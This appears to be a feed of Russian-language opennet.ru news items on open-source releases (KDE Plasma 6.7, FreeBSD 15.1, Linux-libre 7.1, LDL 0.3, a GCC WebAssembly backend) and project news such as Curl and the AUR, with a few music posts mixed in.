Релиз графической библиотеки LDL 0.3, оптимизированной для маломощных систем

В новом выпуске:

• Добавлена поддержка TrueType-шрифтов с использованием библиотеки FreeType.
• Через интеграцию библиотеки stb_image обеспечена поддержка различных форматов изображений.
• Проект стал модульным - по умолчанию в составе движка теперь собираются три библиотеки: LDL, LDL_Image и LDL_Ttf.
• Добавлены новые примеры для работы со шрифтами.
• Началась подготовка полноценной документации.
• Проведён рефакторинг кода для повышения стабильности и производительности.
• Исправлен ошибки и и недоработки в 2D- и 3D-рендерах.

В следующих выпусках планируется завершить работу над документацией, расширить возможности 3D-рендера и предоставить обвязки для языков Python, C# и Object Pascal.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65699

thanks to @prahou for the art for this TUN EP: https://thetun.bandcamp.com/album/two-legs-bad-ep, playing a release show this coming saturday june 20. :) thanks for existing yall!

Релиз среды рабочего стола KDE Plasma 6.7

Основные изменения в KDE Plasma 6.7:

• В состав включён пользовательский интерфейс Plasma Bigscreen, предназначенный для использования на мультимедийных устройствах, подключаемых к телевизорам и проекторам. Окружение оптимизировано для работы с большими экранами и управления без клавиатуры c использованием пультов дистанционного управления или голосового помощника.
• Индегрирован унифицированный движок стилей Union, позволяющий использовать разные технологии стилевого оформления приложений, доступные в KDE. По умолчанию для стилей задействован формат CSS вместо ранее используемого SVG. Подготовлена новая реализация темы Breeze, оформленная в формате CSS. Движок Union состоит из трёх слоёв:
  • Входной слой реализуется через подключаемые плагины, обеспечивающие разбор входных форматов файлов со стилями и их преобразование в абстрактное описание для отрисовки. Например, в качестве входного формата могут использоваться темы оформления в формате SVG или CSS.
  • Промежуточный слой оформлен в виде библиотеки, описывающей модель данных и методы для применения стилей к каждому элементу.
  • Выходной слой содержит плагины для преобразования сформированного промежуточным слоем универсального стиля в команды для отрисовки, специфичные для конкретного графического стека. Например, на выходе могут формироваться стили для QtQuick или Qt Widgets.
  
• Реализована полноценная поддержка сохранения и восстановления сеансов при использовании Wayland, позволяющая восстановить состояние, привязку к виртуальным рабочим столам и позицию окон прерванного сеанса после перезагрузки или аварийного завершения работы. Реализация основана на добавленной в KWin поддержке протокола xdg-session-management, предложенного в выпуске Wayland-Protocols 1.48.
• Добавлена возможность независимого переключения между виртуальными рабочими столами на каждом экране (ранее виртуальные рабочие столы переключались синхронно на всех мониторах, а теперь в привязке к каждому монитору).
  
  
  <video><source src="https://blogs.kde.org/2026/04/18/this-week-in-plasma-per-screen-virtual-desktops-and-wayland-session-restore/kde-per-output-desktops-demo-compressed.mp4"></video>
• Добавлен режим ввода с клавиатуры диакритических знаков и спецсимволов, отсутствующих на физической клавиатуре. При удержании нажатия клавиши, связанной со спецсимволом, теперь показывается всплывающая подсказка, позволяющая во время ввода быстро выбрать нужный спецсимвол. Выбор осуществляется клавишами управления курсором, нажатием упомянутых в подсказке цифр или кликом мыши. Режим реализован в модуле plasma-keyboard и требует включения виртуальной клавиатуры (System Settings > Keyboard > Virtual Keyboard).
  
  
  <video><source src="https://blogs.kde.org/2026/03/14/this-week-in-plasma-press-and-hold-for-alternative-characters/character-palette-popup.webm"></video>
• Предоставлена возможность установки собственных звуковых тем из загруженных архивов, без необходимости их предварительной ручной распаковки в каталог .../share/sounds.
• Добавлена функция для проверки настроек микрофона, позволяющая записать себя, а потом воспроизвести запись для оценки выставленной чувствительности микрофона.
  
  
  <video><source src="https://blogs.kde.org/2026/03/28/this-week-in-plasma-easier-microphone-sensitivity-adjustment/testing-and-adjusting-audio-level.mp4"></video>
• Старый диалог для управления очередью вывода на печать заменён на вызов отдельного приложения plasma-print-queue, позволяющего наглядно управлять несколькими очередями для разных локальных или внешних принтеров.
• В композитный менеджер KWin добавлена возможность использования замещающих друг друга виртуальных фреймбуферов при работе с несколькими GPU (multi-GPU swapchain), а также реализована поддержка графического API Vulkan в DRM-бэкенде (Direct Rendering Manager), что после внесения оптимизаций в будущем позволит добиться увеличения производительности в конфигурациях с несколькими GPU. На текущем этапе производительность связок из встроенных GPU AMD и Intel с дискретными видеокартами AMD и NVIDIA при использовании Vulkan примерно соответствует OpenGL.
• Добавлена поддержка xdg-портала Notification для настройки и вывода уведомлений из изолированных приложений, например, поставляемых в формате Flatpak.
• Добавлена поддержка портала (xdg-desktop-portal) "Background apps" (org.freedesktop.background.Monitor), позволяющего графическим приложениям переходить в фоновый режим со скрытием окон, оставляя лишь индикатор о своём состоянии в системном лотке.
• Добавлена поддержка второй версии портала org.freedesktop.impl.portal.InputCapture, применяемого для организации доступа к захвату ввода из изолированных приложений.
• В KWin добавлена поддержка Wayland-протокола ext-background-effect-v1, дающего возможность создавать такие эффекты, как размытие фона.
• В композитном менеджере KWin реализована поддержка экспериментального Wayland-протокола xx-fractional-scale-v2, благодаря которому удалось избавиться от излишних зазоров между соседними элементами на экранах с высокой плотностью пикселей, например, между развёрнутым на весь экран окном и панелью. Протокол xx-fractional-scale предоставляет возможность масштабирования системы логических координат, значения в которой задаются целыми числами, для повышения точности позиционирования и увеличения разрешения логических координат до отдельных пикселей. Подобная возможность решает проблему с ограниченным разрешением системы логических координат, недостаточным для позиционирования на уровне отдельных пикселей, необходимого для полноценной реализации дробного масштабирования в KDE.

  При помощи протокола xx-fractional-scale композитный сервер и клиент могут согласованно использовать разные системы координат (логические и пиксельные) при работе с объектом wl_surface. Логические координаты применяются для описания размера содержимого и позиций окон с точки зрения пользователя, а пиксельные координаты отражают фактические размеры в буферах при отрисовке на экран. Протокол xx-fractional-scale вводит коэффициент масштабирования (scale), связывающий логические и пиксельные координаты, и позволяющий обрабатывать ситуации, когда на единицу логических координат приходится несколько пикселей.
  
  
  

  <video><source src="https://invent.kde.org/-/project/2612/uploads/8d2a6e380ea09f2318b6c1341894c06c/tiles-v2.webm"></video>
• В KWin внесены оптимизации, повышающие производительность и эффективность энергопотребления в программах, осуществляющих отрисовку при помощи CPU. Оптимизация заметна в большинстве программ KDE и в приложениях, использующих QtWidgets (в QtWidgets для отрисовки применяется CPU, а в QtQuick задействовано ускорение через GPU). Например, при работе в KDevelop теперь всегда плавно двигается указатель, а нагрузка на CPU при прокрутке снизилась с 80-90% до 20%.
• В KWin продолжена работа по реализации поддержки графического API Vulkan в DRM-бэкенде (Direct Rendering Manager). Ожидается, что использование Vulkan позволит добиться увеличения производительности в конфигурациях с несколькими GPU. Реализована возможность использования Vulkan для загрузки текстур из GPU в CPU.
• На системах с драйверами i915 и Intel XE для GPU Intel в KWin включена поддержка аппаратных overlay-плоскостей (overlay plane), позволяющих отображать содержимое напрямую без прохождения через композитинг. Изменение повысило производительность и сократило энергопотребление приложений и игр, поддерживающих добавленную функциональность.
  
  
  
  
• В меню, использующих тему оформления Breeze, реализовано изменение фона элементов при клике.
  
  
  <video><source src="https://blogs.kde.org/2026/04/04/this-week-in-plasma-ui-and-stability-improvements/menu-click-effect.webm"></video>
• Упрощён интерфейс показа QR-кода в виджете работы с буфером обмена (кнопка копирования перенесена в заголовок).
• Повышена точность позиционирования виджетов на рабочем столе. При перемещении виджета в область, в которую он не помещается, теперь выводится эскиз, показывающий ближайшее свободное место, в котором фактически окажется виджет.
  
  
  <video><source src="https://blogs.kde.org/2026/04/04/this-week-in-plasma-ui-and-stability-improvements/widget-positioning.webm"></video>
• Обеспечено изменение стиля всплывающих подсказок в соответствии с активной темой оформления.
• Улучшена реализация эффекта Mouse Marks (превращение курсора в маркер, оставляющий линии на экране) на сенсорных экранах. Добавлена поддержка рисования одновременно нескольких линий на экранах с поддержкой мультитач.
• В синхронизированные с Plasma Login Manager настройки добавлены параметры раскладки клавиатуры.
• В виджетах Task Manager и System Tray удалена опция для использования более крупных пиктограмм и увеличенных отступов на сенсорных экранах и планшетах. Указано, что данная опция не работала корректно и приводила к проблемам при отображении.
• Реализован глобальный режим push-to-talk, при котором микрофон включается только во время нажатия и удержания определённой комбинации клавиш.
• В виджеты управления яркостью и цветопередачей добавлены кнопки для быстрого переключения между светлым и тёмным режимами оформления.
  
  
  <video><source src="https://blogs.kde.org/2026/01/17/this-week-in-plasma-dark-mode-switch-and-global-push-to-talk/global_theme_toggle.webm"></video>
• В конфигураторе реализован показ страниц настройки игровых контроллеров, мыши и тачпада только при наличии данных устройств.
• Улучшено редактирование элементов на рабочем столе на системах с сенсорным экраном.
• При поиске по слову "память" (memory) теперь в числе рекомендаций предлагается запустить приложение System Monitor.
• В виджетах и приложении System Monitor реализована поддержка отслеживания сетевой активности на платформе FreeBSD.
• В диалог завершения зависших процессов добавлен индикатор прогресса выполнения операции.
  
  
  <video><source src="https://blogs.kde.org/2026/02/21/this-week-in-plasma-6.6-is-here/termination-progress.webm"></video>
• В виджете определения цвета пикселя (Color Picker) обеспечен вывод подсказки об отсутствии выбранного цвета (ранее показывалось, что выбран цвет #000000).
• В обзорном режиме реализована возможность использования прокрутки или клавиш Page Up/Page Down для переключения между виртуальными рабочими столами.
• На системах с Wayland обеспечена синхронизация изображения указателя стилуса с указателем мыши и тачпада.
• В KWin реализована возможность определения постоянных правил, исключающих содержимое определённых окон при записи скринкастов.
• В программу для создания скриншотов Spectacle добавлена опция "--release-capture", эквивалентная опции "Accept on click-and-release" в настройках (создание скриншота сразу после отпускания кнопки мыши после выделения прямоугольной области, без отдельного подтверждения операции).
• В приложении System Monitor и виджете для отслеживания состояния системы учтён выбор единиц измерения информации, например, GB (миллиард байт) или GiB (2^30).
• Реализовано округление уровня масштабирования экрана, близкого к 100%, 200% и 300%, до данных величин для повышения производительности.
• На рабочем столе обеспечено появление панели управления виджетами (Widget Explorer) рядом с указателем мыши, а не рядом с левым краем экрана.
• В конфигураторе страница с настройками удалённого рабочего стола (Remote Desktop) перенесена в группу "Безопасность и приватность".
• В виджете "Disks & Devices" улучшена обработка устройств, примонтированных в loop-режиме.
  
  
  <video><source src="https://invent.kde.org/-/project/2703/uploads/1aa2da8e87b87c3188d461bba653749b/Screencast_20260205_192044.webm"></video>
• В меню приложений Kicker по аналогии с Kickoff появилась возможность использования не квадратных кнопок в панели.
• В конфигураторе реализована поддержка предпросмотра видео для тем оформления экрана входа SDDM.
• Улучшено оформление диалогов, создаваемых KWin.
• Добавлена настройка для изменения задержки перед появлением интерфейса переключения между окнами после начала удержания Alt+Tab.
• В настройки виджета просмотра списка окон добавлены опции для изменения порядка сортировки и группировки по виртуальным рабочим столам и комнатам (activitie).
• В конфигураторе на странице настройки курсора при предпросмотре обеспечено приведение изображений курсоров к выбранному размеру.
• В Kwin реализовано запоминание для каждого экрана отступов между окнами в мозаичном режиме.
• При повторном открытии интерфейса выбора обоев рабочего стола обеспечен переход к тому месту, на котором пользователь остановился в прошлый раз.
• В интерфейсе выбора Emoji варианты значков с разным цветом кожи сгруппированы в отдельный всплывающий диалог.
• Предоставлена возможность выставления глобальной комбинации клавиш для очистки истории уведомлений.
  
  
  <video><source src="https://blogs.kde.org/2026/01/31/this-week-in-plasma-getting-6.6-ready-for-release/clear_notification_history.webm"></video>
• В конфигураторе задействована более традиционная кнопка "< Back" для возвращения из подкатегорий (ранее было "< Название категории").
• Добавлен отдельный интерфейс для конфигурирования сетевых принтеров, совместно используемых в Windows-сетях.
• В конфигураторе на странице с настройками уведомлений реализована поддержка воспроизведения выбираемых звуков уведомлений, независимо от включения звука уведомлений.
• В конфигураторе на страницу настройки сети добавлены опции для VPN L2TP.
• Возвращена возможность выбора темы оформления Air Plasma, более легковесной, чем тема Oxygen.
• Реализован скруглённый стиль выделения элементов в приложениях на базе QtWidgets, таких как Dolphin, Okular и KMail. Изменение позволило унифицировать внешний вид и повсеместно перейти к стилю выделения, ранее задействованному в приложениях на базе QtQuick.
• В меню приложений Kickoff обеспечено мерцание секции меню "избранное" сразу после добавления приложения в "избранное" через контекстное меню, чтобы наглядно показать где теперь можно быстро найти приложение.
  
  
  <video><source src="https://blogs.kde.org/2026/02/28/this-week-in-plasma-vietnamese-lunar-calendar-and-rounder-highlights/pulsing-favorites-animation.webm"></video>
• В уведомлениях, генерируемых рабочим столом Plasma, изменена пиктограмма и сокращён заголовок.
• В виджет с часами добавлена поддержка вьетнамского лунного календаря.
• Обновлён интерфейс для настройки OpenVPN, в который добавлена поддержка параметров для управления сжатием, MTU, NCP, TLS, таймаутами и шифрами.
• В конфигураторе на странице настройки сетевого соединения объединены вкладки "Wi-Fi" и "Wi-Fi Security".
• В конфигураторе на странице управления правами доступа приложений появилась кнопка для отзыва разом всех полномочий на запись приложениями скринкастов.
• Подготовлен обработчик KIO S3, позволяющий напрямую из Dolphin и приложений KDE работать с файлами, хранимыми в S3-совместимых облачных хранилищах, таких как Amazon S3, Cloudflare R2, DigitalOcean Spaces и MinIO.
• В виджетах для управления буфером обмена и сетевым подключением реализовна унифицированная кнопка возврата на прошлую страницу (на вложенных страницах теперь не показываются две кнопки "Назад").
  
  
  <video><source src="https://blogs.kde.org/2026/03/14/this-week-in-plasma-press-and-hold-for-alternative-characters/unified-back-button.webm"></video>
• В KRunner по умолчанию включён плагин вывода информации о глобальных комбинациях клавиш.
• В виджете с реализацией глобального меню обеспечен показ меню для активного окна, даже если это окно размещено на другом экране. Для возвращения старого поведения, при котором меню пропадает после перемещения окна на другой экран, в настройки добавлена специальная опция.
• При мозаичной компоновке двух смежных окон они теперь равномерно центрируются во всём доступном экранном пространстве с учётом панелей (раньше ближайшее к панели окно сжималось больше, чем другое окно).
• В изолированных приложениях повышена надёжность инициирования записи скринкастов и запросов к удалённым рабочим столам.
• Налажено задействование 3D-ускорения в конфигурациях с несколькими GPU, один из которых не поддерживает OpenGL.
• Решены проблемы работы с буфером обмена в некоторых приложениях на базе фреймворка wxWidgets, таких как KiCad и Audacity. Исправление включено в состав находящейся в разработке ветки wxWidgets 3.3.3.
• В утилиту kscreen-doctor добавлена поддержка изменения свойства экранов "AutoRotatePolicy", определения активного экрана и одновременного включения/выключения поддержки HDR и расширенного диапазона цветов (Wide Gamut).
• В диалоге выбора экрана для его трансляции на другие системы или предоставления совместного доступа улучшена визуализация эскизов и обеспечен показ обоев рабочего стола в качестве фона.
• Предоставлена возможность добавления дополнительных виджетов с часами для разных часовых поясов, которые среди прочего будут показывать отличия времени от текущего часового пояса.
• В виджете с глобальным меню скруглены углы подсвечиваемых элементов меню.
• Предоставлена возможность определения отдельной клавиши-модификатора для перевода фокуса на панель.
• Диалог для выбора каталогов унифицирован с диалогом, применяемым при сохранении и открытии файлов (вместо отдельного диалога для каталогов в штатный диалог открытия файлов добавлен режим показа только каталогов).
• В инструмент для шифрования каталогов Plasma Vault добавлена индикация монтирования в режиме только для чтения.
• В апплете настройки сети предоставлена возможность ограничения диапазона частот Wi-Fi (2.4 GHz или 5 GHz).
• При отключении активации KRunner при попытке набора с клавиатуры на рабочем столе, реализован вызов обработчика для выделения файлов по первым набранным буквам.
• В виджет System Tray добавлена опция для сортировки элементов в обратном порядке.
• На системах с несколькими GPU обеспечена корректная запись содержимого экрана в Spectacle и приложениях на базе KPipeWire (раньше могло использоваться не то устройство отрисовки).
• В утилиту System Monitor и виджет показа информации о системе добавлено определение конфигураций с несколькими GPU, а так же предоставление статистики о полнодисковом шифровании и RAID.
• В KWin добавлена поддержка 3D LUTs (3D Lookup Tables) для переназначения цветов, что снизило потребление ресурсов на GPU, предоставляющих функции для ускорения преобразования цветов.
• Прекращено создание контекстов OpenGL для приложений, не использующих OpenGL, что позволило снизить потребление памяти на 10-15 MB для каждого подобного приложения и сократить время запуска.
• В KWin внесены оптимизации, повышающие производительность интерфейса переключения между окнами по Alt+Tab при включении эффекта "Highlight Window" и большом числе свёрнутых окон.
• В конфигураторе на странице "Default Applications" появилась возможность выбора вызываемого по умолчанию приложения с реализацией календаря-планировщика.
• В апплет, вызываемый при клике средней кнопки мыши на часах, добавлена опция для открытия календаря-планировщика.
• Добавлена поддержка помещения в избранное операций в приложениях, показанных в результатах поиска.
• В контекстное меню, показываемое при клике правой кнопкой мыши на обоях рабочего стола, добавлен пункт для просмотра информации об изображении.
• В System Monitor обеспечено разделение GPU по названиям. Через контекстное меню, показываемое для приложения System Monitor, теперь можно напрямую вызвать конкретные режимы мониторинга, например, просмотр списка запущенных процессов.
• Виджет для вставки в панель разделителя теперь доступен через кнопку добавления новых элементов на странице настройки панели, а не через боковую панель со списком виджетов.
• Для многомониторных конфигураций добавлена опция, позволяющая отображать интерфейс переключения между окнами по Alt+Tab только на основном экране, независимо от того на каком экране находится фокус ввода.
• В меню приложений Kicker обеспечена маркировка специальным значком недавно установленных программ, по аналогии с тем как это делается в интерфейсе Kickoff.
• Разрешено перемещение мышью приложений в секцию "избранное" виджетов Kickoff, Kicker и Dashboard.
• В KRunner расширены возможности вычисления произвольных математических выражений, например, теперь можно вводить не только "sqrt(2) + 2", но и "2 + sqrt(2)".
• Уменьшен размер анимированных GIF-изображений, создаваемых в приложениях, использующих библиотеку KPipeWire.
• В KWin добавлена эвристика, определяющая целесообразность применения прямого вывода (direct scan-out) для повышения производительности и снижения энергопотребления при раскрытии окон на весь экран.
• Реализована возможность выставления для дисплея цветового профиля ICC при включённом режиме HDR.
• Для многих ноутбуков с процессорами AMD реализована возможность отключения драйвера адаптивной модуляции подсветки экрана или ручной регулировки параметров при его использовании. Указанный драйвер изменяет цвета на экране для улучшения видимости информации при низком уровне яркости.
• При выводе информации о системе (Info Center) показания датчиков температуры теперь выводятся в единицах измерения, заданных в системных настройках.
• В меню Kickoff добавлена поддержка удаления приложений из секции "Избранное", путём перемещения мышью ярлыка за пределы виджета.
  
  
  <video><source src="https://blogs.kde.org/2026/05/09/this-week-in-plasma-icc-profiles-%EF%B8%8F-hdr/drag-to-remove-favorites.webm"></video>
• В виджет управления выводом на печать добавлена индикация числа активных и находящихся в очереди заданий вывода на печать по отдельности для каждого из принтеров.
• В KWin добавлены оптимизации, снижающие энергопотребление при работе с полноэкранными окнами и эффектами, на которые не влияет применение прямого вывода (direct scan-out).
• В меню приложений Kicker добавлена опция для отображения списка недавно открытых каталогов. В виджетах Kicker и Dashboard предоставлена возможность удаления элементов из секции "Избранное" через их перемещение мышью за пределы виджета.
• В виджет управления сетью добавлена поддержка создания дубликатов профилей сетевых соединений.
• В правила переопределения атрибутов окон приложений (KWin Window Rules) добавлена возможность привязки диалоговых окон к указанному родительскому окну.
• Добавлена возможность переименования или перемещения типового каталога "Projects", который с недавних пор стал создаваться дистрибутивами в домашнем каталоге пользователя в дополнение к каталогам "Documents", "Downloads", "Desktop", "Videos", "Music" и "Pictures".
• Добавлена функция увеличения содержимого экрана без заметной потери качества, основанная на эффекте Zoom в KWin.
• В размещаемый на панели виджет вывода на печать добавлены метки о числе активных и находящихся в очереди работ.
• При запросе X11-приложением, выполняемым через XWayland, прав на отправку программно сгенерированных событий мыши и клавиатуры, теперь отображается имя приложения. В конфигураторе обеспечен вывод списка приложений, которым ранее было предоставлено подобное полномочие.
• Обеспечено применение стиля оформления KDE к диалогам, выводимым Qt-приложениями, использующими QML-тип MessageDialog (например, используется приложением Sticky Note в диалоге подтверждения).
• Упрощено нажатие на кнопки в верхней части Widget Explorer (нажатие теперь срабатывает если кликнуть уперев курсор в границу экрана над кнопкой, без точного попадания по кнопке).
• Реализован учёт дополнительных параметров при автоматическом изменении яркости экрана для более качественной работы в условиях часто меняющегося освещения.
• Убрано ограничение, отводившее 25 секунд на выбор цвета после вызова виджета с пипеткой (Color Picker).


Источник: https://www.opennet.ru/opennews/art.shtml?num=65698

Godspeed You! Black Emperor - Mladic

https://www.youtube.com/watch?v=PKdKnNlGhvc

#music

Релиз FreeBSD 15.1

Основные изменения:

• Драйверы беспроводных устройств rtw88 (Realtek 802.11n/ac), rtw89 (Realtek 802.11ax) и iwlwifi (Intel 02.11a/b/g/n/ac/ax/be) синхронизированы с ядром Linux 7.0.
• В ядре реализован фреймворк для выбора планировщика задач. В конфигурации ядра на системах amd64 в дополнение к используемому по умолчанию планировщику SCHED_ULE активирована сборка классического планировщика задач SCHED_4BSD. Для выбора планировщика задач во время загрузки добавлен sysctl-параметр kern.sched.
• Проведена работа по обеспечению поддержки стандарта C23 в кодовой базе для сборки компиляторами в режиме C23. Полная поддержка C23 ожидается в ветке FreeBSD 16. В новом стандарте добавлены константы nullptr, тип _BitInt(n) и ключевые слова bool, true и false, которые могли конфликтовать с заданными в старом коде одноимёнными идентификаторами. Поддержка C23 позволит использовать в коде FreeBSD новые возможности языка, такие как заголовочный файл stdbit.h, функция memalignment(), обновлённые limits.h и stdint.h с макросом _WIDTH и типом char8_t.
• В пакетном фильтре ipfw реализована возможность задания произвольных масок в таблицах (lookup table), позволяющих игнорировать любые сочетания битов в ключах и элементах таблицы, например, можно использовать непоследовательные маски IP-адресов, такие как "lookup src-ip4:255.255.253.255". Удалён код для совместимости с версиями пакетного фильтра ipfw, поставлявшимися до выпуска FreeBSD 8.
• Разрешено направление IPv6-пакетов в divert-сокеты, в которых ранее допускалась работа только с IPv4. В команду ifconfig добавлен флаг 'stableaddr' для генерации стабильных IPv6-адресов, неизменных для каждой подсети (Stateless Address Autoconfiguration, RFC 7217).
• Командная оболочка для пользователей "root" и "freebsd" заменена с csh на sh.
• Добавлена утилита setaudit для управления политиками системного аудита.
• В утилиту find добавлены опции "-xattr" и "-xattrname" для поиска файлов с учётом расширенных атрибутов файлов.
• В утилиту newfs добавлена опция "-u" для отключения механизма soft updates и журналирования для UFS2.
• Убрана по умолчанию утилита ipfs, применявшаяся для сохранения и восстановления таблиц трансляции адресов, и отключена необходимая для её работы функциональность в ядре (можно вернуть в настройках сборки).
• В скрипте bsdinstall включена по умолчанию установка pkgbase с компонентами, указанными в переменной COMPONENTS. Старый метод установки на базе distset остаётся доступен, если определена переменная DISTRIBUTIONS.
• В стандартные библиотеки добавлены функции tdestroy, strdupa, strndupa, posix_spawnattr_getexecfd_np, posix_spawnattr_setexecfd_np, pthread_tryjoin_np. В функциях memcpy, memmove и memset на системах AArch64 задействованы оптимизации на базе инструкций MOPS (Memory Operations).
• Добавлена библиотека libuvmem с реализаций механизма распределения памяти vmem, работающего в пользовательском пространстве и представляющего совместимый с vmem API для приложений.
• В образы для виртуальных машин и облачных систем включён пакетный менеджер pkg и реализована поддержка атомарного обновления пакета с базовой системой при первой загрузке.
• В конфигурацию ядра MINIMAL включён драйвер virtio_scsi, позволяющий загружать систему в виртуальных машинах на базе qemu/kvm.
• Реализованы системные вызовы pdwait и pdfork для нового механизма создания и завершения процессов, использующего дескрипторы процессов.
• В прослойку для совместимости с Linux добавлен fcntl F_DUPFD_QUERY, использующий kcmp KCMP_FILE для проверки файлового дескриптора в Linux-контейнерах.
• Включена сборка драйвера iwx для беспроводных адаптеров Intel AX210/AX211/AX411 с поддержкой Wi-Fi 6E и Wi-Fi 7.
• Обновлены драйверы. Добавлена поддержка сетевых адаптеров Intel E835-XXV-4 и Intel E835 Ethernet, RAID-контроллеров, используемых в серверах Fujitsu PRIMERGY, а также NVMe-накопителей, применяемых в Google Compute Engine C4. Улучшена поддержка плат Raspberry Pi. Добавлена поддержка счётчиков отслеживания производительности (hwpmc), предоставляемых в CPU Intel Alder Lake, Alder Lake-N и Emerald Rapids.
• Драйвер hid настроен для предоставления доступа пользователям группы game, что позволяет обращаться к игровым контроллерам без повышения привилегий, используя библиотеки, подобные libsdl.
• В утилите mt обеспечена совместимость с ленточными накопителями, поддерживающими стандарты LTO-10 и LTO-10P (Linear Tape-Open Generation 10) .
• В команду "zpool prefetch" добавлена поддержка метаданных BRT (Block Reference Table), повышающих производительность клонирования и освобождения блоков.
• В клиент NFS добавлена поддержка экспортирования через NFS файловых систем, не учитывающих регистр символов в именах файлов и каталогов. При бездисковой загрузке через NFSv4 реализована поддержка монтирования NFS-раздела в качестве корневой ФС и маппинга имён или идентификаторов пользователей через nfsuserd. Добавлена начальная поддержка расширения к NFSv4.2 с POSIX ACL. В сервер и клиент NFSv4 добавлена поддержка атрибута архивирования (UF_ARCHIVE), используемого в NFS-клиенте Windows.
• В интерфейс splash добавлена возможность задания заставки в формате PNG, показываемой при завершении работы системы.
• Добавлен sysctl net.inet.ipf.jail_allowed, позволяющий привязать к Jail-окружению собственный набор настроек и правил пакетного фильтра ipfilter.
• Добавлен sysctl allow.vmm_ppt для проброса доступа к PCI-устройствам в изолированные окружения на базе гипервизора bhyve.
• В GPU-драйвере на базе virtio реализована поддержка виртуальных окружений на базе Parallels Desktop.
• Добавлена поддержка регистров FGT (Fine-Grained Trap), механизма Extended Destination ID и инструкций MOPS (Memory Operations), расширяющих возможности виртуализации и повышающих производительность на системах ARM64. Добавлена поддержка ARM64-расширения LASS (Linear Address Space Separation) для усиления изоляции между ядром и пространством пользователя.
• В реализацию фреймбуфера гипервизора bhyve добавлена поддержка UNIX-сокетов, позволяющих пробросить графическую консоль в Jail-ы не по сети.
• Обновлены версии OpenZFS 2.4.2, OpenSSL 3.5.6, NSS 3.123.1, xz 5.8.3, tcpdump 4.99.6, zlib 1.3.2, zstd 1.5.7, blocklistd 2026-02-07, ncurses 6.6, bsddialog 1.0.5, bmake 20251111, SQLite 3.50.4, unbound 1.25.1, MIT Kerberos 1.22.2, Heimdal Kerberos 1.22.2.
• Консольный шрифт spleen обновлён до версии 2.2.0 и расширен дополнительными символами (длинное тире, короткое тире, дефис, угловые скобки, белый квадрат, крест и двойной крест). Улучшено выравнивание символов на экранах с высокой плотностью пикселей. Таблицы символов Unicode обновлены до версии 17.0.0, в которой добавлено 4803 символа.
• Подсистема blacklist переименована в blocklist с фоновым процессом blocklistd. Старые настройки в rc-скриптах и правилах пакетного фильтра продолжают действовать, но приводят к выводу предупреждения.
• Инструментарий OpenPAM перемещён в новый пакет FreeBSD-pam, а библиотека Zstandard и утилита zstd в пакет FreeBSD-zstd.
• На системах, установленных через пакеты freebsd-base, заблокирован вызов сборочных сценариев installworld и installkernel для избежания рассогласования состояния системы с пакетами.
• Прекращено формирование сборок в формате OCI (Oracle Cloud Infrastructure).
• Объявлены устаревшими и будут удалены в ветке FreeBSD 16 утилиты fdisk, bsdlabel, lpr, lpd, lpc, lpq, lprm, lp, pac, lptest и chkprintcap. Для работы с дисковыми разделами вместо fdisk и bsdlabel рекомендуется использовать gpart или bsdinstall, а для организации вывода на печать следует задействовать порт print/cups или sysutils/LPRng. В FreeBSD 16 также намерены удалить sysctls hw.ata.rotating и hw.ata.unmapped_io, и драйверы hifn (криптоускорители Hifn 7751/7951/7811/7955/7956), safe (криптоускорители SafeNet SafeXcel 1141/1741), le (AMD Am7900 LANCE and Am79C9xx ILACC/PCnet Etherne), fdc (floppy disk controller) и agp (Accelerated Graphics Port).


Источник: https://www.opennet.ru/opennews/art.shtml?num=65697

Конкурс разработчиков СПО Код Логики

Заявки принимаются до 15 августа 2026 года. Награждение лауреатов состоится 2-4 октября на XXII конференции разработчиков свободных программ. В своё время при поддержке Института Логики зародился IPlabs Linux Team, ставший в дальнейшем основой для ALT Linux.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65696

В GCC утверждено добавление бэкенда для WebAssembly

Бэкенд позволит использовать GCC для компиляции исходного кода на языках C/C++ в промежуточный код WebAssembly. Компиляцию в WebAssembly можно использовать для интеграции с JavaScript-проектами, запуска в web-браузере, использования в Node.js или создания обособленных многоплатформенных приложений, запускаемых при помощи WASM runtime.

Предложенная для включения в GCC реализация использует в качестве внешних зависимостей инструментарий wabt, реализацию libc для WebAssembly (wasi-libc) и компоновщик wasm-ld. Не вся запланированная функциональность реализована, например, отсутствует поддержка отладочной информации, ссылочных типов, таблиц, исключений, структуризации и операций setjump/longjump.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65695

Проект Curl на месяц прекратит приём отчётов об уязвимостях

Сообщения, отправленные через форму на Hackerone и email security@curl.se в указанное время сопровождающими рассматриваться не будут. Возможность отправки pull-запросов и сообщений о проблемах через GitHub останется доступна, но разбор накопившихся сообщений об уязвимостях начнётся только после 3 августа.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65693

Доступен полностью свободный вариант ядра Linux-libre 7.1

Для очистки ядра от несвободных частей проектом Linux-libre создан универсальный shell-скрипт, который содержит тысячи шаблонов для определения наличия бинарных вставок и исключения ложных срабатываний. Также доступны для загрузки готовые патчи, созданные на основе использования вышеупомянутого скрипта. Ядро Linux-libre рекомендовано для использования в дистрибутивах, соответствующих критериям Фонда СПО по построению полностью свободных дистрибутивов GNU/Linux. Например, Linux-libre используется в таких дистрибутивах, как GNU Guix System, Dragora Linux, Trisquel, Dyne:Bolic, gNewSense, Parabola, Musix и Kongoni.

В выпуске Linux-libre 7.1-gnu обновлён код чистки блобов в драйверах Nova-core, btmtk, qat_6xxx, amdgpu, m88ds3103, saa7164, r8169, ath12k, mt792x и mt7996. Решены проблемы со сборкой при использовании Rust. Обеспечена чистка блобов в новых драйверах для чипов Lontium LT8713SX DP MST и Realtek 802.11be 8922D. Произведена чистка имён блобов в dts-файлах (devicetree) для архитектуры Aarch64. Прекращена чистка драйверов fore200e, acenic, yam, smc91c92_cs и speedfax, которые были удалены из состава ядра.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65692

Arch Linux отключил регистрацию новых учётных записей в AUR

Для захвата пакетов атакующие использовали предоставляемую в AUR возможность принимать сопровождение над пакетам, оставшихся без сопровождающих и имеющих статус "orphaned". Подобная возможность предоставлялась без ограничений и проверок любому желающему. В настоящее время в AUR размещено 107406 пакетов, из которых 13050 имеют статус "orphaned" (неделю назад было 15261). За последнюю неделю в репозитории было обновлено 5578 пакетов, а за предыдущую - 3446. В репозитории насчитывается 141967 зарегистрированных пользователей и 69 сопровождающих пакеты (в предыдущую неделю было 140949 пользователей и 69 сопровождающих).

Источник: https://www.opennet.ru/opennews/art.shtml?num=65691

Вычислительный кластер из 2000 смартфонов Google Pixel

